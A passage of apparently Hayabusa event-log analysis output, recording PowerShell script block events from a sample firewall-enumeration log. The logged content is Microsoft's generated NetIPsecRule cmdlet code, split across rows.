ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewal",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) 
$__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 